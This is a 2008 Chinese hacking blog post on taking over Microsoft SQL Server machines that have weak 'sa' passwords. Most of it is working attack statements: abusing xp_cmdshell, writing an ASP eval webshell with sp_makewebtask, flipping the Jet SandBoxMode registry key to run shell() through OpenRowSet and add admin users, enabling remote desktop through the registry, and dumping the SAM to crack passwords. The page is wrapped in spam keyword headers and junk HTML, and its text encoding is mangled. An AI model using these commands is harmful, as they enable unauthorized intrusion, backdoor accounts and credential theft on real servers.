青青草原综合久久大伊人导航_色综合久久天天综合_日日噜噜夜夜狠狠久久丁香五月_热久久这里只有精品

Ay's Blog@CNSSUESTC

關(guān)于1433弱口令的利用-- by __ay

????? 這篇文章是面對(duì)大部分人的,所以對(duì)某些水平的人來(lái)說(shuō)難免會(huì)有許多廢話(huà),你們可以跳過(guò),呵呵~好了,開(kāi)始吧……啊~我肚子餓了~呵呵

????? 首先講下什么是1433弱口令漏洞,所謂弱口令就是指很簡(jiǎn)單的一些密碼隨便猜就能猜出來(lái)的,比如說(shuō)密碼是123,123456,admin甚至用戶(hù)名密碼 相同等等之類(lèi)的狀況,我們就能輕易獲得對(duì)方的密碼。呵呵,許多人都很懶,所以密碼都很簡(jiǎn)單,包括我也是,呵呵……(而且還經(jīng)常那123當(dāng)臨時(shí)密碼)。在說(shuō) 下什么是1433弱口令,1433所指的是1個(gè)服務(wù)端口,什么服務(wù)呢?那就是傳說(shuō)中的MSSQL啦,試想MSSQL安裝之初的默認(rèn)密碼是空,然而又存在許 多懶網(wǎng)管,那么我們只要拿個(gè)工具簡(jiǎn)單的掃下在檢測(cè)下密碼……嘿嘿……可想而之掃到1433弱口令的幾率還是蠻大的~呵呵

??? 接下來(lái)我們說(shuō)說(shuō)拿到SA權(quán)限的1433弱口令我們能干什么,大家都知道XP_CMDSHELL這個(gè)擴(kuò)展儲(chǔ)存吧,這個(gè)擴(kuò)展儲(chǔ)存可以看做是MSSQL提供給管 理者執(zhí)行CMD命令的一個(gè)功能模塊,通過(guò)這個(gè)我們可以執(zhí)行CMD命令而更可喜的是SA權(quán)限的帳戶(hù)一般都是以SYSTEM權(quán)限啟動(dòng)的,權(quán)限相當(dāng)于計(jì)算機(jī)管理 員權(quán)限,那么我們相當(dāng)于可以用CMD命令的形式控制你要入侵的計(jì)算機(jī)了,當(dāng)然我們肯定不會(huì)滿(mǎn)足于用CMD控制機(jī)器,我們的目標(biāo)是通過(guò)3389或者其他的軟 件來(lái)達(dá)到控制計(jì)算機(jī)的目的。下面我們來(lái)分類(lèi)討論各種情況下的切入點(diǎn),僅供參考……

以下假設(shè)你拿到了SA權(quán)限若口令的機(jī)器。有專(zhuān)門(mén)的SQL查詢(xún)分析器可以連接對(duì)方.大家有興趣可以去下一個(gè)來(lái)看看.

?

1.當(dāng)3389終端開(kāi)啟的時(shí)候,而目標(biāo)機(jī)子也沒(méi)做類(lèi)似IP這樣的過(guò)濾,那么我們就直接執(zhí)行CMD命令加個(gè)用戶(hù),然后用加的用戶(hù)登上去就OK了~呵呵

(需要無(wú)敵RP啊~~~)

2.那么如果CMD命令可以執(zhí)行,但是沒(méi)開(kāi)3389,我們先掃下目標(biāo)IP,看他有沒(méi)有開(kāi)80端口,有的話(huà)90%是有 WEB服務(wù)的,那么我們是SA權(quán)限直接丟個(gè)小馬上去,嘿嘿.........有了馬我們可以上傳東西啦~~傳個(gè)開(kāi)3389的工具上去執(zhí)行,機(jī)器重啟下就可 以登3389了.

?

以下是SA權(quán)限下備分小馬的語(yǔ)句;

exec sp_makewebtask '備分路徑',' select ''一句話(huà)木馬'' ';--

?

例子如下

http:\\xx.x.x.x.asp?id=1;exec sp_makewebtask 'd:\wwwroot\ay.asp',' select ''<%25eval (request('#'))25%>'' ';--

?

?

??????? 其實(shí)1433弱口令跟注入非常相似,比如你1433上有WEB服務(wù)你也可以用查詢(xún)語(yǔ)句把用戶(hù)名和密碼找出來(lái)進(jìn)后臺(tái)傳馬.思路是非常多的,但是看你怎么使用了.

????? MSSQL的功能非常強(qiáng)大,所以幾乎沒(méi)有它辦不到的事(擴(kuò)展儲(chǔ)存沒(méi)刪除情況下~而且SA權(quán)限沒(méi)被降為USERS用戶(hù)啟動(dòng)).但是但是萬(wàn)一人家把CMD給你 刪除了,恢復(fù)也恢復(fù)不了的時(shí)候又該怎么辦呢?如果我們沒(méi)有CMDSHELL,又沒(méi)開(kāi)3389,那么SA權(quán)限看起來(lái)就象是雞肋~

?

????? 關(guān)于在SQL連接器上查看目錄的方式

?

exec xp_dirtree '(目錄名,比如c:\)',1,1

?????

????? 執(zhí)行后就會(huì)返回目標(biāo)機(jī)器指定目錄下的文件夾和文件,那么通過(guò)這個(gè)你就可以列目錄了

????? 這個(gè)擴(kuò)展儲(chǔ)存的說(shuō)明在注入語(yǔ)句集合里面有,這里就略過(guò)

?

?

?

?

?

exec xp_regread/exec xp_regwrite 注冊(cè)表操作的擴(kuò)展儲(chǔ)存

?

????? 下面引用啊D注入語(yǔ)句里面的例子

?

寫(xiě)注冊(cè)表
exec master..xp_regwrite 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Jet\4.0\Engines','SandBoxMode','REG_DWORD',1

?

讀注冊(cè)表
exec master..xp_regread 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon','Userinit'

?

?

???? 如果CMDSHELL用不了的時(shí)候,我們來(lái)試著恢復(fù)下CMD

?

??? exec master.dbo.sp_addextendedproc 'xp_cmdshell','xplog70.dll'

?

??? 然后執(zhí)行CMD命令,如果還是不行的話(huà),唉~~那沒(méi)辦法了,呵呵,一會(huì)講到,呵呵~~~繼續(xù)往下看吧~

?

???? 來(lái),我們來(lái)提一下傳說(shuō)中的沙盒模式提權(quán),

?

?

不是分割線(xiàn)

--------------------------------------------------------------------------------------------------------------------------------

???? 首先我在<Jet引擎可以調(diào)用VBA的shell()函數(shù)>(http://support.microsoft.com/kb /q239104/)這份資料知道在accessl里可以直接進(jìn)行sql查詢(xún),具體的在Access中測(cè)試.測(cè)試的SQL語(yǔ)句如下:

SELECT shell('c:\windows\system32\cmd.exe /c net user ray 123 /ad');

?

查看計(jì)算機(jī)管理的本地用戶(hù),馬上發(fā)現(xiàn)多出一個(gè)ray用戶(hù),說(shuō)明語(yǔ)句成功執(zhí)行了.接下來(lái)寫(xiě)一個(gè)VBS腳本任意連接一個(gè)mdb來(lái)測(cè)試這個(gè)SQL語(yǔ)句

Set Conn=Createobject("Adodb.Connection")

Conn.Open "Provider=Microsoft.Jet.OLEDB.4.0;Data Source=test.mdb"

Set Rs=Conn.execute("Select Shell(""cmd.exe /c net user ray 123 /ad"")")
Msgbox Rs(0)


運(yùn)行后會(huì)出現(xiàn)"表達(dá)式中的'Shell'函數(shù)未 定義"的錯(cuò)誤,<Jet引擎可以調(diào)用VBA的 shell()函數(shù)>提到WINDOWS在Jet引擎中設(shè)置了一個(gè)名為SandBoxMode的開(kāi)關(guān),它的注冊(cè)表位置在 HKEY_LOCAL_MACHINE\SoftWare\Microsoft\Jet\4.0\Engine\SandBoxMode里,0為在任何所 有者中中都禁止起用安全設(shè)置,1為僅在允許的范圍之內(nèi),2則是必須是Access的模式下,3則是完全開(kāi)啟安全設(shè)置.默認(rèn)情況下為2,只能在Access 的模式下調(diào)用VBA的shell()函數(shù),我們嘗試將此注冊(cè)表值改為0,結(jié)果成功的運(yùn)行了VBS利用Jet引擎可以調(diào)用VBA的shell()函數(shù)執(zhí)行了 系統(tǒng)命令.

通常一臺(tái)MSSQL服務(wù)器同時(shí)支持Access數(shù)據(jù)庫(kù),所以只要有一個(gè)sa或者dbowner的連接,就滿(mǎn)足了修改注冊(cè)表的條件,因?yàn)镸SSQL有一個(gè)名為xp_regwrite的擴(kuò)展,它的作用是修改注冊(cè)表的值.語(yǔ)法如下


exec maseter.dbo.xp_regwrite Root_Key,SubKey,Value_Type,Value


如果存在一個(gè)sa或者dbowner的連接的SQL注入點(diǎn),就可以構(gòu)造出如下注入語(yǔ)句


InjectionURL;EXEC master.dbo.xp_regwrite 'HKEY_LOCAL_MACHINE','SoftWare\Microsoft\Jet\4.0\Engine','SandBoxMode','REG_DWORD','0'--


那我們將SandBoxMode開(kāi)關(guān)的注冊(cè)表值修改為0就成功 了.接著連接到一個(gè)Access數(shù)據(jù)庫(kù)中,就可以執(zhí)行系統(tǒng)命令,當(dāng)然執(zhí)行系統(tǒng)命令我們只需要一個(gè)Access數(shù)據(jù)庫(kù)相關(guān)Select的注入點(diǎn)或者直接用 ASP文件Select調(diào)用這個(gè)VBA的 shell()函數(shù),但是實(shí)際上MSSQL有一個(gè)的OpenRowSet函數(shù),它的作用是打開(kāi)一個(gè)特殊的數(shù)據(jù)庫(kù)或者連接到另一個(gè)數(shù)據(jù)庫(kù)之中.當(dāng)我們有一個(gè) SA權(quán)限連接的時(shí)候,就可以做到打開(kāi)Jet引擎連接到一個(gè)Access數(shù)據(jù)庫(kù),同時(shí)我們搜索系統(tǒng)文件會(huì)發(fā)現(xiàn)windows系統(tǒng)目錄下本身就存在兩個(gè) Access數(shù)據(jù)庫(kù),位置在%windir%\system32\ias\ias.mdb或者%windir%\system32\ias\ dnary.mdb,這樣一來(lái)我們又可以利用OpenRowSet函數(shù)構(gòu)造出如下注入語(yǔ)句:
InjectionURL';Select * From OpenRowSet('Microsoft.Jet.OLEDB.4.0',';Database=c:\winnt\system32\ias\ias.mdb','select shell("net user ray 123 /ad")');--


如果你覺(jué)得不大好懂的話(huà),我可以給你做一個(gè)簡(jiǎn)化的理解:
1,Access可以調(diào)用VBS的函數(shù),以System權(quán)限執(zhí)行任意命令
2,Access執(zhí)行這個(gè)命令是有條件的,需要一個(gè)開(kāi)關(guān)被打開(kāi)
3,這個(gè)開(kāi)關(guān)在注冊(cè)表里
4,SA是有權(quán)限寫(xiě)注冊(cè)表的
5,用SA寫(xiě)注冊(cè)表的權(quán)限打開(kāi)那個(gè)開(kāi)關(guān)
6,調(diào)用Access里的執(zhí)行命令方法,以system權(quán)限執(zhí)行任意命令

??????

?

------------------------------------------------------------------------------------------

不是分割線(xiàn)

?????

????? 看完了吧~辛苦了~呵呵,呵呵,直接把原文貼出來(lái)了,我好懶啊我~原理就是上面說(shuō)的那個(gè)

????? CMD不是刪除了么?嘿嘿~我們用剛剛講的方法來(lái)執(zhí)行,具體如下

?????

首先執(zhí)行

?

exec master..xp_regwrite 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Jet\4.\Engines','SandBoxMode','REG_DWORD',1

?

?


呵呵~把注冊(cè)表改了~

不放心的話(huà)我們來(lái)讀讀看~

?

exec master..xp_regread 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Jet\4.\Engines','SandBoxMode'

?

如果返回的值是1的話(huà)證明命令成功了

?


那么我們就可以用SYSTEM函數(shù)來(lái)執(zhí)行命令了 下面給出執(zhí)行命令語(yǔ)句

?

select * from openrowset('microsoft.jet.oledb.4.0',';database=c:\windows\system32\ias\ias.mdb','select shell("cmd.exe /c query user >c:\windows\11.txt")');

?

紅色字體的是我執(zhí)行的命令,>c:\windows \11.txt的意思是把回顯命令導(dǎo)入到windows的文件夾下的1.txt,一會(huì)要用到的.黑色字體是我們數(shù)據(jù)庫(kù)的路徑,特別需要注意的是如果是 windows2000 那么灰色部分就應(yīng)該是c:\winnt\system32\ias\ias.mdb?

如果是windows2003的話(huà)就是c:\windows\system32\ias\ias.mdb

?

后邊也是一樣情況 win2003是windows目錄而2000是winnt目錄

?

?

?

執(zhí)行命令的時(shí)候是不是心里面很沒(méi)底呢?而且有些命令比如NETSTAT之類(lèi)的是需要查看回顯的,那么怎么才能得到回顯呢~~~嘿嘿~~無(wú)疑MSSQL肯定為我們提供了讀取文件內(nèi)容的功能操作

那么我們就來(lái)看看怎么操作的吧~~呵呵

操作如下
select * from openrowset('microsoft.jet.oledb.4.0','text;database=c:\windows\','select * from 11.txt')

?

灰色部分是文件所在目錄,而紅色是文件名

?

比如我想讀D:\WWW\XXX\目錄下的A.ASP文件,那么語(yǔ)句如下

?

select * from openrowset('microsoft.jet.oledb.4.0','text;database=D:\WWW\XXX\','select * from A.ASP')

?

還記得我剛剛把命令回顯導(dǎo)出的步驟嗎?我們就用上面這個(gè)操作來(lái)讀取TXT內(nèi)容就可以得到我們的CMD執(zhí)行命令回顯了,很好玩吧~呵呵??

?

這就是我饒過(guò)CMDSHELL來(lái)執(zhí)行命令的一點(diǎn)心得,呵呵? 我們接下來(lái)說(shuō)說(shuō)3389的問(wèn)題

?

一些關(guān)于3389終端的信息:

?

????? 其實(shí)在HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\Wds\rdpwd\Tds\tcp下的PortNumber鍵值 和

????? HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp下的PortNumber鍵值

記錄著3389的端口號(hào) 如果想改連接端口號(hào)的話(huà)直接用xp_regwrite修改對(duì)應(yīng)的鍵值就OK了~呵呵

?

????? 那么接下來(lái)說(shuō)說(shuō)最關(guān)鍵的問(wèn)題,在注冊(cè)表下存在一個(gè)決定3389開(kāi)啟與否的鍵值,鍵值位置如下:

HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server下的fDenyTSConnections

?

其值是0表示開(kāi)啟 1表示關(guān)閉,我們直接用XP_REGWRITE把值修改就好了~~

?

?

語(yǔ)句如下

?

exec master..xp_regwrite 'HKEY_LOCAL_MACHINE','SYSTEM\CurrentControlSet\Control\Terminal Server','fDenyTSConnections','REG_DWORD',0

?

你們不放心可以用XP_REGREAD確認(rèn)

具體語(yǔ)句不寫(xiě)了,大家現(xiàn)學(xué)現(xiàn)賣(mài)吧,呵呵~~

?

好了,最后說(shuō)過(guò)我沒(méi)實(shí)踐過(guò)的思路,理論上可行吧,呵呵

?

當(dāng)你的沙盒模式也不能用的時(shí)候那么,嘿嘿?? ^-^

我們起碼還是能從目標(biāo)機(jī)器上拿點(diǎn)什么東西的嘛,比如說(shuō)SAM啊~呵呵

?

首先用OPENROWSET這個(gè)函數(shù)把SAM的內(nèi)容暴出來(lái)

然后復(fù)制內(nèi)容,本地新建個(gè)SAM把復(fù)制的內(nèi)容導(dǎo)進(jìn)去,保存,相當(dāng)與把目標(biāo)機(jī)子的SAM給下下來(lái),然后暴吧~~把管理員的密碼暴出來(lái),接著用XP_REGWRITE把3389端口開(kāi)了就好了

?

?

其實(shí)開(kāi)3389的時(shí)候還會(huì)遇到很多情況,由于我沒(méi)實(shí)踐,所以沒(méi)什么好說(shuō)的了,如果大家以后遇到什么這方面的問(wèn)題可以拿來(lái)一起討論,嘿嘿

?

至于怎么破SAM,OPENROWSET的函數(shù)用法之類(lèi)的就不說(shuō)了~去百度一下吧~~

?

posted on 2008-12-07 16:15 __ay 閱讀(2523) 評(píng)論(0)  編輯 收藏 引用 所屬分類(lèi): Security

青青草原综合久久大伊人导航_色综合久久天天综合_日日噜噜夜夜狠狠久久丁香五月_热久久这里只有精品
  • <ins id="pjuwb"></ins>
    <blockquote id="pjuwb"><pre id="pjuwb"></pre></blockquote>
    <noscript id="pjuwb"></noscript>
          <sup id="pjuwb"><pre id="pjuwb"></pre></sup>
            <dd id="pjuwb"></dd>
            <abbr id="pjuwb"></abbr>
            欧美+日本+国产+在线a∨观看| 亚洲美女黄色| 一本大道久久a久久综合婷婷| 好男人免费精品视频| 99精品视频免费| 狠狠色狠色综合曰曰| 亚洲性夜色噜噜噜7777| 亚洲美洲欧洲综合国产一区| 久久久亚洲影院你懂的| 久久精品国产96久久久香蕉| 欧美视频第二页| 亚洲精品视频在线| 亚洲啪啪91| 欧美成人精品三级在线观看| 欧美成人嫩草网站| 在线成人亚洲| 久久久亚洲精品一区二区三区 | 欧美粗暴jizz性欧美20| 麻豆九一精品爱看视频在线观看免费| 国产九色精品成人porny| 一二美女精品欧洲| 亚洲一区二区不卡免费| 欧美日韩午夜在线视频| 亚洲精品小视频| 国产精品99久久久久久宅男| 欧美护士18xxxxhd| 亚洲人成网站在线观看播放| 亚洲人成网站777色婷婷| 欧美成人综合网站| 亚洲精品社区| 亚洲自拍偷拍视频| 国产精品三级视频| 欧美在线视频全部完| 久久婷婷人人澡人人喊人人爽| 国内一区二区三区在线视频| 久久久久国产精品一区| 欧美激情视频一区二区三区在线播放| 亚洲国产精品久久久久秋霞不卡| 麻豆国产精品va在线观看不卡 | 在线综合欧美| 午夜老司机精品| 国产一区二区视频在线观看| 久久久久九九九九| 欧美成人中文| 亚洲一区二区四区| 国产伪娘ts一区| 免费观看成人www动漫视频| 最近看过的日韩成人| 亚洲伊人色欲综合网| 国产女精品视频网站免费| 久久九九免费视频| 亚洲东热激情| 午夜在线一区二区| 亚洲高清123| 欧美日韩午夜在线视频| 羞羞答答国产精品www一本| 麻豆精品91| 亚洲婷婷免费| 在线观看一区二区精品视频| 欧美日韩精品欧美日韩精品| 小嫩嫩精品导航| 亚洲激情校园春色| 久久gogo国模裸体人体| 亚洲黄色在线看| 国产精品任我爽爆在线播放| 久久中文字幕一区二区三区| 一区二区国产日产| 蜜桃久久av一区| 亚洲男同1069视频| 91久久精品日日躁夜夜躁欧美 | 亚洲国产精品成人一区二区 | 女主播福利一区| 亚洲字幕一区二区| 亚洲国产欧美久久| 久久午夜精品| 亚欧成人精品| 亚洲一区二区三| 亚洲精品久久久久久久久久久| 国产精品人成在线观看免费| 欧美国产日韩xxxxx| 久久精品电影| 亚洲在线免费视频| 一区二区国产精品| 亚洲激情综合| 欧美福利视频网站| 久久久国产精品亚洲一区| 亚洲香蕉网站| 99在线视频精品| 亚洲青涩在线| 在线日韩欧美视频| 国内成人精品视频| 国产精品看片你懂得| 欧美久久久久| 欧美黄色免费| 欧美大尺度在线观看| 久久亚洲综合色| 久久精品视频在线看| 欧美在线欧美在线| 西瓜成人精品人成网站| 亚洲午夜精品久久久久久浪潮| 亚洲精品欧美激情| 亚洲人成人一区二区在线观看| 免费看成人av| 免费亚洲电影| 欧美激情一区二区三区高清视频| 麻豆av福利av久久av| 久久久久久久综合| 久久久精品网| 老司机免费视频一区二区三区| 久久久精品一品道一区| 久久久久国色av免费观看性色| 欧美一区二区在线观看| 久久福利毛片| 久久久噜噜噜久久中文字免| 久久精品青青大伊人av| 久久久一二三| 欧美freesex交免费视频| 欧美大片一区二区| 亚洲国产精品热久久| 亚洲激情偷拍| 在线综合亚洲欧美在线视频| 亚洲男同1069视频| 久久成人一区| 欧美大片国产精品| 欧美日韩卡一卡二| 国产欧美一级| 亚洲国产精品日韩| 亚洲一二三区精品| 欧美一区久久| 欧美韩国日本一区| 一本色道88久久加勒比精品| 一区二区高清视频在线观看| 性一交一乱一区二区洋洋av| 久久五月激情| 欧美色精品在线视频| 国产美女诱惑一区二区| 影音先锋欧美精品| 一区二区精品在线| 久久本道综合色狠狠五月| 麻豆9191精品国产| 一区二区三区四区五区在线| 欧美在线亚洲一区| 欧美激情一区二区三区蜜桃视频 | 亚洲精品午夜精品| 欧美一区综合| 欧美另类变人与禽xxxxx| 国产伦精品一区二区三区免费| 在线免费高清一区二区三区| 亚洲婷婷国产精品电影人久久| 久久青草久久| 亚洲天堂成人在线视频| 免费看成人av| 国产精品亚洲аv天堂网| 91久久精品一区| 久久福利资源站| av成人免费观看| 久久麻豆一区二区| 国产精品自拍网站| 一本久道久久综合婷婷鲸鱼| 久久精品国产69国产精品亚洲| 亚洲精品一区二区三区av| 欧美在线视频一区二区| 欧美日韩一区在线观看视频| 在线观看一区二区精品视频| 午夜在线视频观看日韩17c| 亚洲欧洲一区二区三区| 久久久www成人免费精品| 国产精品久久97| a4yy欧美一区二区三区| 蜜桃伊人久久| 欧美一区国产二区| 国产精品视频自拍| 中国日韩欧美久久久久久久久| 欧美激情一二区| 久久久久久久999| 国语自产精品视频在线看抢先版结局| 亚洲一二三区在线观看| 亚洲精品一区二区三区福利| 久久综合狠狠| 在线观看视频一区二区欧美日韩 | 日韩亚洲欧美一区| 欧美成人精品一区二区| 亚洲国产精品ⅴa在线观看| 久久五月天婷婷| 久久av一区二区三区| 国产亚洲一区二区三区在线播放| 欧美一区二区精美| 亚洲欧美另类在线观看| 国产精品视频免费在线观看| 亚洲欧美日韩在线高清直播| 一个色综合导航| 国产精品视频一二| 欧美在线观看网站| 性做久久久久久久久| 国产一区二区三区四区五区美女| 久久九九精品99国产精品| 久久精品日韩一区二区三区| 黄色一区三区| 欧美激情1区2区3区| 欧美大片一区|